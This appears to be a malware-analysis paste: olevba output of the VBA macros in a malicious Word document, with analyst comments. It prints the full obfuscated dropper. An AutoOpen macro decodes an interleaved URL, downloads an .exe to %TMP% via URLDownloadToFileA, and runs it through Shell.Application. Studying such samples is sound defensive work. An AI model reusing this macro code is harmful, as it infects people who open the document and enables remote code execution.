dynamoo

Malicious Word macro

Mar 13th, 2015
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MAS--B- r-1179776-2.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: r-1179776-2.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: r-1179776-2.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Sub autoopen()
      ' Auto-exec entry point: olevba's AutoExec/AutoOpen row for this module says it runs when the Word document is opened.
      ' Its only statement calls atqk_x482mp6v, the Sub defined in the .bas module that declares URLDownloadToFileA.
  16. atqk_x482mp6v
  17. End Sub
  18. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  19. ANALYSIS:
  20. +----------+----------+---------------------------------------+
  21. | Type     | Keyword  | Description                           |
  22. +----------+----------+---------------------------------------+
  23. | AutoExec | AutoOpen | Runs when the Word document is opened |
  24. +----------+----------+---------------------------------------+
  25. -------------------------------------------------------------------------------
  26. VBA MACRO Class1.cls
  27. in file: r-1179776-2.doc - OLE stream: u'Macros/VBA/Class1'
  28. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  29. Public Sub JHyKASbxIHuhtS84()
      ' Filler procedure. All ten Subs in Class1 follow one template: a For loop over DoEvents, then a
      ' 16-character string literal assigned to a local that is never read afterwards.
      ' The loop's upper bound (Jl here) has no Dim or assignment anywhere in this dump; assuming Option Explicit
      ' is off it is an Empty Variant (0), so "6 To 0" would run zero times - TODO confirm against the sample.
      ' No visible module calls any of these Subs (autoopen only calls atqk_x482mp6v), so they look like padding.
      ' NOTE(review): the random-looking literals are presumably what triggered olevba's "Base64 Strings" row for
      ' this module; nothing here decodes them, so treat that flag as a likely false positive.
  30. Dim geRVTgYKeFHEkG74 As Integer
  31. For geRVTgYKeFHEkG74 = 6 To Jl
  32. DoEvents
  33. Next geRVTgYKeFHEkG74
  34. Dim vLMDtrhALGmHPA31 As String
  35. vLMDtrhALGmHPA31 = "CtlLoYxCdDrrCR11"
  36. End Sub
  37.  
  38. Public Sub xlvLhuAzNZGLWN89()
  39. Dim WTCBlIIcmnviie69 As Integer
  40. For WTCBlIIcmnviie69 = 3 To yB
  41. DoEvents
  42. Next WTCBlIIcmnviie69
  43. Dim txdGLvkuqZelnG26 As String
  44. txdGLvkuqZelnG26 = "EIQWCNvZTnSUDK16"
  45. End Sub
  46.  
  47. Public Sub ofWOXlANArfREH64()
  48. Dim lrqvxpqOjtKHXZ44 As Integer
  49. For lrqvxpqOjtKHXZ44 = 9 To sb
  50. DoEvents
  51. Next lrqvxpqOjtKHXZ44
  52. Dim JhORnQktQeAtoT34 As String
  53. JhORnQktQeAtoT34 = "auVlNAaFAtyjZk14"
  54. End Sub
  55.  
  56. Public Sub iTpzwmkdrKMuCX21()
  57. Dim TJIibCvUvHEwoB11 As Integer
  58. For TJIibCvUvHEwoB11 = 9 To LW
  59. DoEvents
  60. Next TJIibCvUvHEwoB11
  61. Dim HIVVBSikgJiUZQ81 As String
  62. HIVVBSikgJiUZQ81 = "fMxregfSOGJXGF72"
  63. End Sub
  64.  
  65. Public Sub pIJXclhCxOCUIg61()
  66. Dim UMhzAWxkJUYXMk41 As Integer
  67. For UMhzAWxkJUYXMk41 = 9 To EN
  68. DoEvents
  69. Next UMhzAWxkJUYXMk41
  70. Dim KQTKzQyaUIqifr31 As String
  71. KQTKzQyaUIqifr31 = "hCrVyddxzYMxnu12"
  72. End Sub
  73.  
  74. Public Sub vpkmlyrWJDiBrW25()
  75. Dim XwHnxUqjsQJfjV15 As Integer
  76. For XwHnxUqjsQJfjV15 = 3 To nR
  77. DoEvents
  78. Next XwHnxUqjsQJfjV15
  79. Dim usyhXcMNzSwbPP86 As String
  80. usyhXcMNzSwbPP86 = "RvRwNBawxPtDCD76"
  81. End Sub
  82.  
  83. Public Sub uxtXPcgVNZdndx27()
  84. Dim kflSpdVIGEJSTo17 As Integer
  85. For kflSpdVIGEJSTo17 = 9 To Ev
  86. DoEvents
  87. Next kflSpdVIGEJSTo17
  88. Dim GbKKfGrepAnaKs88 As String
  89. GbKKfGrepAnaKs88 = "NhiUFRDSNEtdqV78"
  90. End Sub
  91.  
  92. Public Sub XNMdWIxljyiqdn33()
  93. Dim ldllVpEGQrJvvE23 As Integer
  94. For ldllVpEGQrJvvE23 = 7 To fn
  95. DoEvents
  96. Next ldllVpEGQrJvvE23
  97. Dim EeIivNdvntwPKh93 As String
  98. EeIivNdvntwPKh93 = "zgufZAlMWetBtl83"
  99. End Sub
  100.  
  101. Public Sub CeAuCYmrOCqQVL73()
  102. Dim wgNdaiAbrWMBpX53 As Integer
  103. For wgNdaiAbrWMBpX53 = 7 To VT
  104. DoEvents
  105. Next wgNdaiAbrWMBpX53
  106. Dim TyhzAVqoLXvsEI43 As String
  107. TyhzAVqoLXvsEI43 = "rkFiRnkRfMibHQ23"
  108. End Sub
  109.  
  110. Public Sub dRzRKlperameln47()
  111. Dim PHnPXMhvvBrjYE27 As Integer
  112. For PHnPXMhvvBrjYE27 = 1 To UF
  113. DoEvents
  114. Next PHnPXMhvvBrjYE27
  115. Dim MUHnwPBigNIZNg97 As String
  116. MUHnwPBigNIZNg97 = "lLgYbsyEIVkJdl88"
  117. End Sub
  118.  
  119.  
  120. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  121. ANALYSIS:
  122. +------------+----------------+-----------------------------------------+
  123. | Type       | Keyword        | Description                             |
  124. +------------+----------------+-----------------------------------------+
  125. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  126. |            |                | may be used to obfuscate strings        |
  127. |            |                | (option --decode to see all)            |
  128. +------------+----------------+-----------------------------------------+
  129. -------------------------------------------------------------------------------
  130. VBA MACRO àûâàûâàÀàâï.bas
  131. in file: r-1179776-2.doc - OLE stream: u'Macros/VBA/\u0430\u044b\u0432\u0430\u044b\u0432\u0430\u0410\u0430\u0432\u043f'
  132. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  133. #If VBA7 Then
       ' Conditional compilation: the VBA7 branch uses PtrSafe/LongPtr, the #Else branch uses plain Long.
       ' Both branches bind the same private name to URLDownloadToFileA in urlmon via Lib/Alias, so the API name
       ' never appears at the call site - only in this Declare, which is what olevba's "Lib" and
       ' "URLDownloadToFileA" rows for this module refer to.
       ' NOTE(review): the accented identifiers look like Cyrillic decoded with the wrong code page (the OLE stream
       ' name of this module is printed with \u04xx escapes). Match on the Alias string, not on these names.
  134.     Private Declare PtrSafe Function ÎðâààÌÐÎëâïâàï Lib "urlmon" Alias _
  135.     "URLDownloadToFileA" (ByVal BHGBkjsdfF As LongPtr, _
  136.     ByVal ÐÎÀðàâûðàÃÎâï As String, _
  137.     ByVal ÐÎÀðàâûðàÃÎâïf As String, _
  138.     ByVal ÐÎÀðàâûðàÃÎâïfd As Long, _
  139.     ByVal ÐÎÀðàâûðàÃÎâïfds As LongPtr) As LongPtr
  140. #Else
  141.     Private Declare Function ÎðâààÌÐÎëâïâàï Lib "urlmon" Alias _
  142.     "URLDownloadToFileA" (ByVal BHGBkjsdfF As Long, _
  143.     ByVal ÐÎÀðàâûðàÃÎâï As String, _
  144.     ByVal ÐÎÀðàâûðàÃÎâïf As String, _
  145.     ByVal ÐÎÀðàâûðàÃÎâïfd As Long, _
  146.     ByVal ÐÎÀðàâûðàÃÎâïfds As Long) As Long
  147. #End If
  148. Sub atqk_x482mp6v()
       ' Called from autoopen. Passes two decoded strings to the Function defined right after this Sub, which
       ' forwards them to the aliased URLDownloadToFileA as source URL and destination file.
       ' QSzFZhQCxywB keeps characters 1, 3, 5, ... of its argument, so every even position is filler:
       '   arg 1 begins "http://" once decoded (one character seems to have been lost in this paste, so re-derive
       '         the full URL from the sample itself before using it as an IOC);
       '   arg 2 is Environ("TMP") & "\fJChjfgD675eDTU.exe".
  149. âàûâÀÀûâïûâà QSzFZhQCxywB("h<tQtFpi:I/t/Uajwubnr„sA.]cloom.Ja@uy/}jWsc/$b4i„n\.SeTxQe["), Environ(QSzFZhQCxywB("TsMQPQ")) & QSzFZhQCxywB("\8f9JmC}h1jhf)geD06R7i5SeNDBTeU_.'elx€e(")
  150. End Sub
  151. Function âàûâÀÀûâïûâà(z0ktwRXRQZl2qo0_ As String, d4ok1z1Z0N As String) As Boolean
       ' Stage 1: call the aliased URLDownloadToFileA with (0, URL, local path, 0, 0). The return value is stored
       ' but never checked, and the Function's own Boolean result is never assigned.
  152. ÏÐûâàÀ = ÎðâààÌÐÎëâïâàï(0&, z0ktwRXRQZl2qo0_, d4ok1z1Z0N, 0&, 0&)
       ' Stage 2: the Chr$() chain uses the same interleaved encoding as the string literals; keeping the odd
       ' positions gives the ProgID "Shell.Application", which is handed to CreateObject.
  153. Set ãíÃØÀÏøâûà = CreateObject(QSzFZhQCxywB(Chr$(83) & Chr$(132) & Chr$(104) & Chr$(55) & Chr$(101) & Chr$(87) & Chr$(108) & Chr$(89) & Chr$(108) & Chr$(131) & Chr$(46) & Chr$(133) & Chr$(65) & Chr$(52) & Chr$(112) & Chr$(97) & Chr$(112) & Chr$(61) & Chr$(108) & Chr$(117) & Chr$(105) & Chr$(47) & Chr$(99) & Chr$(110) & Chr$(97) & Chr$(122) & Chr$(116) & Chr$(59) & Chr$(105) & Chr$(75) & Chr$(111) & Chr$(54) & Chr$(110) & Chr$(115)))
       ' Stage 3: Open is invoked on Environ("TMP") & "\fJChjfgD675eDTU.exe" - the same path the caller passes in
       ' as the download destination, rebuilt here from Chr$() codes instead of reusing d4ok1z1Z0N.
       ' Host-side indicators visible in this code: a urlmon download made from the Word process, an .exe written
       ' under %TMP%, and that file then opened through Shell.Application.
  154. ãíÃØÀÏøâûà.Open Environ(QSzFZhQCxywB(Chr$(84) & Chr$(106) & Chr$(77) & Chr$(107) & Chr$(80) & Chr$(104))) & QSzFZhQCxywB(Chr$(92) & Chr$(114) & Chr$(102) & Chr$(85) & Chr$(74) & Chr$(71) & Chr$(67) & Chr$(85) & Chr$(104) & Chr$(43) & Chr$(106) & Chr$(95) & Chr$(102) & Chr$(67) & Chr$(103) & Chr$(98) & Chr$(68) & Chr$(105) & Chr$(54) & Chr$(110) & Chr$(55) & Chr$(94) & Chr$(53) & Chr$(42) & Chr$(101) & Chr$(98) & Chr$(68) & Chr$(57) & Chr$(84) & Chr$(127) & Chr$(85) & Chr$(118) & Chr$(46) & Chr$(96) & Chr$(101) & Chr$(36) & Chr$(120) & Chr$(117) & Chr$(101) & Chr$(100))
  155. End Function
  156.  
  157.  
  158.  
  159. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  160. ANALYSIS:
  161. +------------+--------------------+-----------------------------------------+
  162. | Type       | Keyword            | Description                             |
  163. +------------+--------------------+-----------------------------------------+
  164. | Suspicious | CreateObject       | May create an OLE object                |
  165. | Suspicious | Lib                | May run code from a DLL                 |
  166. | Suspicious | Open               | May open a file                         |
  167. | Suspicious | Environ            | May read system environment variables   |
  168. | Suspicious | Chr                | May attempt to obfuscate specific       |
  169. |            |                    | strings                                 |
  170. | Suspicious | URLDownloadToFileA | May download files from the Internet    |
  171. +------------+--------------------+-----------------------------------------+
  172. -------------------------------------------------------------------------------
  173. VBA MACRO àïàâïÏÏàâï.bas
  174. in file: r-1179776-2.doc - OLE stream: u'Macros/VBA/\u0430\u043f\u0430\u0432\u043f\u041f\u041f\u0430\u0432\u043f'
  175. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  176.  
  177. Public Function QSzFZhQCxywB(CwOLiEdjfquIe As String) As String
       ' String decoder called by the downloader module: walks the input from position 1 in steps of 2 and appends
       ' one character each time, i.e. it returns the characters at odd positions and drops the rest.
       ' The URL, file path and ProgID exist in the document only in interleaved form. This is consistent with
       ' olevba's summary flags (MAS--B-) carrying no "I" (IOCs) flag and with this module's analysis reporting
       ' nothing; applying the same odd-position selection to the literals recovers the strings.
  178. For pytQnFatnd = 1 To Len(CwOLiEdjfquIe) Step 2
  179. QSzFZhQCxywB = QSzFZhQCxywB & Mid(CwOLiEdjfquIe, pytQnFatnd, 1)
  180. Next
  181. End Function
  182.  
  183. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  184. ANALYSIS:
  185. No suspicious keyword or IOC found.